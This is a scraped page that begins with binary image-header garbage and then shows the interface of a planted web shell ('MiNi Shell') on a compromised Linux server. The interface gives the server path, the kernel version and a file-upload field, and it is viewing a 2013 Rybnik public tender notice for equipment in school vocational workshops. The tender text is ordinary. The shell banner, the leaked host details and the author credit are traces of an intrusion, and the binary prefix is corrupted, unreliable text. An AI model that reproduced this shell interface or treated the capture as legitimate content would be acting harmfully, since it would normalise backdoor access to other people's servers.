JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130201/43744-N-2013.html

<p class="kh_header"><b>Rybnik: Dostawa sprzętu i wyposażenia pracowni zawodowych 
w ramach projektu Mam zawód - mam pracę w regionie

Zadanie 1.	Wyposażenie pracowni praktycznej nauki zawodu w Zespole Szkół Ekonomiczno-Usługowych w Rybniku - pracownia logistyczna.
Zadanie 2.	Wyposażenie pracowni praktycznej nauki zawodu w Zespole Szkół Mechaniczno-Elektrycznych im. T. Kościuszki w Rybniku - pracownia techniczna dla technika mechanika.</b><br>
<b>Numer ogłoszenia: 43744 - 2013; data zamieszczenia: 01.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Rybnik , ul. B. Chrobrego 2, 44-200 Rybnik, woj. śląskie, tel. 032 4223011, faks 032 4224124.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rybnik.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu i wyposażenia pracowni zawodowych 
w ramach projektu Mam zawód - mam pracę w regionie

Zadanie 1.	Wyposażenie pracowni praktycznej nauki zawodu w Zespole Szkół Ekonomiczno-Usługowych w Rybniku - pracownia logistyczna.
Zadanie 2.	Wyposażenie pracowni praktycznej nauki zawodu w Zespole Szkół Mechaniczno-Elektrycznych im. T. Kościuszki w Rybniku - pracownia techniczna dla technika mechanika..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa sprzętu i wyposażenia pracowni zawodowych w ramach projektu Mam zawód mam pracę w regionie.
Zadanie 1. Wyposażenie pracowni praktycznej nauki zawodu w Zespole Szkół Ekonomiczno-Usługowych w Rybniku - pracownia logistyczna.
Zadanie 2. Wyposażenie pracowni praktycznej nauki zawodu w Zespole Szkół Mechaniczno-Elektrycznych im. T. Kościuszki w Rybniku - pracownia techniczna dla technika mechanika.

Szczegółowy zakres przedmiotu zamówienia opisany został w SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.10-9, 32.55.00.00-3, 48.00.00.00-8, 48.19.00.00-6, 48.52.00.00-9, 30.21.61.30-6, 22.11.40.00-2, 22.45.80.00-5, 38.11.21.00-4, 42.62.00.00-8, 30.12.30.00-7, 42.65.00.00-7, 42.65.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga zabezpieczenia oferty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz ofertowy (załącznik nr 1 do SIWZ) 
2.	Zestawienie cen (załącznik nr 3 do SIWZ)
3.  Pełnomocnictwo do podpisania oferty (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza) względnie do podpisania innych dokumentów składanych wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.um.rybnik.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Rybnika, ul. Bolesława Chrobrego 2, Wydział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2013 godzina 09:00, miejsce: Urząd Miasta Rybnika, ul. Bolesława Chrobrego 2, pok. 302.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie będzie współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego i budżetu państwa..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wyposażenie pracowni praktycznej nauki zawodu w Zespole Szkół Ekonomiczno-Usługowych w Rybniku - pracownia logistyczna..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wyposażenie pracowni praktycznej nauki zawodu w Zespole Szkół Ekonomiczno-Usługowych w Rybniku, ul. Św. Józefa 30, 44-217 - pracownia logistyczna w:
1.	telefon (1szt.) - wymagania: urządzenie sieciowe z funkcją faksu, telefonu i automatycznej sekretarki,
2.	programy graficzne i statystyczne (wersja edukacyjna; moduły: Bussines Intelligence, CRM, Handel, Logistyka, Finanse i Księgowość, Business Process Menagement - dla 30 stanowisk),
3.	drukarka kodów kreskowych (1szt., ręczna, wraz ze sterownikami pod system WINDOWS 2000, XP, Vista, 7, metalowy mechanizm drukujący, wydruk etykiet metodą termiczną i termotransferową, wbudowany wewnętrzny zasilacz),
4.	czytnik kodów kreskowych (ręczny, wraz z oprogramowaniem, komunikacja po USB - 1 szt.),
5.	biblioteczka zawodowa: wyposażona we wzory dokumentów transportu wewnętrznego 
i magazynowania (bloczki WZ, PZ, faktury, listy przewozowe, 20 szt.), 
6.	słowniki ekonomiczne (słownik terminologii logistycznej - T. Janiak, Wydawnictwo ILIM, lub Słownik specjalistyczny Transport i Logistyka angielsko-francusko-hiszpańsko-polski - T. Kacperska, Wydawnictwo Kanion - 16 szt.);
7.	urządzenie do śledzenia pojazdów (1 szt.) - zestaw powinien zawierać odbiornik GPS oraz mapę Europy dla samochodów ciężarowych lub nawigacja samochodowa (wyposażenie minimalne: pamięć RAM 128 MB, pamięć ROM 2 GB, ekran dotykowy, odbiornik GPS, wbudowana antena, bluetooth, czytnik kart pamięci, mapy polski i europy, bateria wewnętrzna, zasilacz),
8.	słowniki pojęć logistycznych polsko - angielski/angielsko - polski (16 szt.).
Szczegółowy zakres przedmiotu zamówienia opisany został w SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.10-9, 32.55.00.00-3, 48.00.00.00-8, 48.19.00.00-6, 48.52.00.00-9, 30.21.61.30-6, 22.11.40.00-2, 22.45.80.00-5, 38.11.21.00-4, 42.62.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wyposażenie pracowni praktycznej nauki zawodu w Zespole Szkół Mechaniczno-Elektrycznych im. T. Kościuszki w Rybniku - pracownia techniczna dla technika mechanika..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wyposażenie pracowni praktycznej nauki zawodu w Zespole Szkół Mechaniczno-Elektrycznych im. T. Kościuszki w Rybniku, ul. Kościuszki 23, 44-200 - pracownia techniczna dla technika mechanika w:
1.	zgrzewarka ręczna punktowa do metalu - wymagane parametry: zasilanie 230 V, grubość zgrzewnej blachy (2-4mm)/ 1 szt.,
2.	twardościomierz (1szt.) - twardościomierz ręczny z odczytem analogowym. Umożliwia pomiar w pełnym zakresie najczęściej stosowanych skali twardości: Vickers, Brinell, Rockwell A, B, C. Urządzenie stosowane jest do pomiarów metodą Vickersa twardych materiałów po hartowaniu za pomocą wgłębnika diamentowego o obciążeniu od HV5 (kg) do HV100 (kg) oraz metodą Brinella (nie ulepszone cieplnie) za pomocą kulki o śr. 2,5 mm - 5 mm i obciążeniach od 62,5 kg do 250 kg,
3.	średnicówka z czujnikiem (1 szt.) - wymagania: zakres pomiarowy do 160 mm,
4.	tokarka do metalu (1szt.) - wymagane parametry: zasilanie 230V, długość toczenia do 600 mm (napięcie - 230V; moc przyłączeniowa - 300W; długość elementu obrabianego - 300 mm; średnica tocz. el. nad łożem - 180 mm; śr. tocz. el. nad suportem - 110 mm; prześwit wrzeciona - 20 mm; stożek wrzeciona (Mk) - III; stożek tulejki (Mk) - II; zakres obrotów - 2st. (obr/min) - 100 - 2500; przekładnia obrotów, płynna regulacja obrotów, gwinty metryczne - 10 st. (mm) - 0,4 - 2; gwinty calowe - 18 st.; maks. posuw sup. nożowego - 55 mm; maks. posuw poprzecznego sup. - 65 mm; maks. posuw podłużnego suportu - 300 mm; automatyczny posuw podłużny; regulowany posuw poprzeczny; rozmiary d/sz/w (mm) - 730/ 330/330; masa - 40 kg; wyposażenie podstawowe: 3-szczękowa głowica uniwersalna O 80 mm; kieł stały, zestaw kół zębatych; wyposażenie specjalne: 4-ro szczękowa głowica uniwersalna; O 80 mm; tarcza czołowa; luneta stała; luneta przesuwna; zestaw gwintowników calowych; wskaźnik liczby gwintów; kieł obrotowy Mk II; głowica zaciskowa; tuleje zaciskowe O 3, 4, 6, 8, 10, 12 mm; głowica wiertnicza 13/16B; przyrząd frezerski; trzpień B16/Mk; komplet noży SK 8 x 8 (11 szt.); kołnierz sprzęgający pod uchwyt trójszczękowy /1 szt.,
5.	pirometr (1 szt.) - wymagania: laserowy, bezdotykowy;
6.	tachometr (1 szt.) - wymagania: zakres pomiarowy metodą mechaniczną lub optyczną w zakresie 1-20000 obr/min, laserowy, bezdotykowy,
7.	młotek Poldi z płytkami wzorcowymi (1 szt.) - wymagania: młotek, wzorce twardości, lupa pomiarowa;
8.	frezarka (1 szt.) - dolnowrzecionowa lub górnowrzecionowa, uniwersalna lub tokarko-frezarka mini, minimalne parametry: zasilanie 230V; wymiary stołu 710x640 mm; wymiary stołu przesuwnego: 500x480 mm; wysokość robocza 910 mm; średnica trzpienia 30 mm; odchylany trzpień -5o do +30o; ustawianie wysokości trzpienia 100 mm; długość mocująca 105 mm; maks. średnica narzędzia 200 mm; maks. średnica opuszczanego narzędzia 180 mm; otwieranie stołu frezarskiego 200 mm; obroty piły głównej 1800/3000/6000/9000 obr./min; moc silnika 2,82 kW,
9.	szlifierka walcowa (1 szt.) - wymagane parametry: maks. szlifowanie płaszczyzna do szerokości 800 mm, min. długość 60 mm; min./maks. grubość obrabianego przedmiotu 0,8/75 mm; ściernica walcowa 132x410 mm; posuw bezstopniowo 0-3,0 m/min; zakres obrotów 1440 obr./min; króciec ssący 100 mm; silnik 0,75 kW (1,0 PS)/400 V; waga 80 kg,
10.	przyrząd do pomiaru chropowatości powierzchni (1 szt.)- wymagane parametry: odcinki pomiarowe: 1,5/4,8/15 mm oraz 0,64/3,2/16 mm; maksymalna długość odcinka pomiarowego: 17,5 mm; odcinki elementarne: 0,25/0,8/2,5 mm; zakres: 320 mikrometrów (-210/+110); rozdzielczość 10 nm.; klasa dokładności: 1 klasa zgodnie z DIN 4772; pięć programów pomiarowych; kolorowy wyświetlacz oraz wyjście USB i Bluetooth; możliwość komunikacji z drukarką oraz z programem Turbo Datawin.; wyposażony w wbudowaną pamięć; zasilany z baterii lub gniazda sieciowego;
11.	aparat Erichsena (1 szt.) lub inne urządzenie do pomiaru tłoczności lub ogólnych pomiarów mechanicznych,
12.	giętarko-zaginarka (1 szt.) - wymagane parametry: długość robocza do 2000 mm, szerokość ramienia zaginającego do 20 mm, kąt zaginania do 145, grubość blachy do 1 mm, wałki-O 28 mm; walce górne -O 98 mm; walce dolne -O 115 mm,
13.	mikroskop metalograficzny ze zgładami (1 szt.) - wymagane parametry: zakres powiększeń od 50 do 1000, oświetlacz halogenowy o mocy 6V/30W; zasilacz wbudowany w podstawę mikroskopu; płynna regulacja natężenia oświetlenia; regulacja położenia włókna żarówki; nasadka binokularowa z regulacją dioptryjną w obu okularach oraz regulacją rozstawu okularów; zmieniacz obiektywów posiadający 4 gniazda; okular PLAN kompensacyjne: okular 10x/18 (2 szt.); okular 12,5x/14 (2 szt.); okular pomiarowy oraz mikrometr 0.01 mm; obiektywy PLAN achromatyczne CF wolne od aberacji: PLAN achromat 10x/0.25, PLAN achromat 20x/0.35, PLAN achromat 40x/0.65, PLAN achromat 100x/1.2,
14.	zestaw do sterowania pneumatyką (NV 3020) /1 szt.
Szczegółowy zakres przedmiotu zamówienia opisany został w SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.30.00-7, 42.65.00.00-7, 42.65.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com